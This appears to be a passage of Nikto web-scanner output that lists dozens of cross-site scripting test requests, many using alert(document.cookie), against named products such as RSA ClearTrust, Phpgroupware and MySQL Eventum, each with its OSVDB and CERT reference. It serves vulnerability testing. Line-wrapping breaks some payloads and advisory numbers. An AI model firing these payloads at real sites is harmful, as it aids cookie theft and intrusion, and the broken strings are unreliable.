    .html. + OSVDB-0: GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script > : RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/adviso ries/CA-2000-02.html. + OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')< /script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert .org/advisories/CA-2000-02.html. + OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')< /script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert .org/advisories/CA-2000-02.html. + OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</script>&month =03&day=05 : DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). htt p://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable ')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</ script>&PATH=acatalog%2f : Actinic E-Commerce services is vulnerable to Cross Si te Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /bb000001.pl<script>alert('Vulnerable')</script> : Actinic E-Comm erce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/a dvisories/CA-2000-02.html. + OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</script> : With malformed URLS, Coldfusion is vulnerable to Cross Site Scripting (XSS). http:// www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> : Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http ://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /addressbook/index.php?surname=<script>alert('Vulnerable')</scrip t> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http:/ /www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://ww w.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</sc ript> : 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the querystring. This may be a Null HTTPd server. + OSVDB-0: GET /a.jsp/<script>alert('Vulnerable')</script> : JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrad e to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html . + OSVDB-0: GET /<script>alert('Vulnerable')</script>.thtml : Server is vulnerabl e to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /<script>alert('Vulnerable')</script>.shtml : Server is vulnerabl e to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /<script>alert('Vulnerable')</script>.jsp : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.c ert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /%0a%0a<script>alert(\"Vulnerable\")</script>.jsp : Jetty jsp ser vlet engine is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/adv isories/CA-2000-02.html. + OSVDB-6662: GET /<script>alert('Vulnerable')</script> : Server is vulnerable t o Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-9239: GET /mailman/admin/ml-name?\"><script>alert('Vulnerable')</script> ; : Mailmain is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/ad

    visories/CA-2000-02.html. + OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</script> : G Photos index.php rep Variable XSS. + OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</script> : GPho tos index.php rep Variable XSS. + OSVDB-25497: GET /index.php?rep=<script>alert(document.cookie)</script> : GPho tos index.php rep Variable XSS. + OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> : FastCGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site S cripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> : Fas t-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> : F ast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Si te Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-14633: GET /ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>aler t(Vulnerable)</script> : Sun Answerbook is vulnerable to XSS in the search fiel d. + OSVDB-19947: GET /apps/web/index.fcgi?servers=&section=<script>alert(document. cookie)</script> : Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-12606: GET /index.php?err=3&email=\"><script>alert(document.cookie)</scr ipt> : MySQL Eventum is vulnerable to XSS in the email field. + OSVDB-12607: GET /forgot_password.php?email=\"><script>alert(document.cookie)< /script> : MySQL Eventum is vulnerable to XSS in the email field. + OSVDB-12606: GET /bugs/index.php?err=3&email=\"><script>alert(document.cookie) </script> : MySQL Eventum is vulnerable to XSS in the email field. + OSVDB-12607: GET /bugs/forgot_password.php?email=\"><script>alert(document.coo kie)</script> : MySQL Eventum is vulnerable to XSS in the email field. + OSVDB-12606: GET /eventum/index.php?err=3&email=\"><script>alert(document.cook ie)</script> : MySQL Eventum is vulnerable to XSS in the email field. + OSVDB-12607: GET /eventum/forgot_password.php?email=\"><script>alert(document. cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field. + OSVDB-2562: GET /login/sm_login_screen.php?error=\"><script>alert('Vulnerable' )</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are v ulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-200002.html. + OSVDB-2562: GET /login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')< /script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vul nerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02 .html. + OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vuln erable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 13 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/C A-2000-02.html. + OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulner able')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA2000-02.html. + OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</script> : Al an Ward A-Cart 2.0 contains several XSS vulnerabilities + OSVDB-2790: GET /index.php?vo=\"><script>alert(document.cookie);</script> : Ra lusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.or g/advisories/CA-2000-02.html.

    Você também pode gostar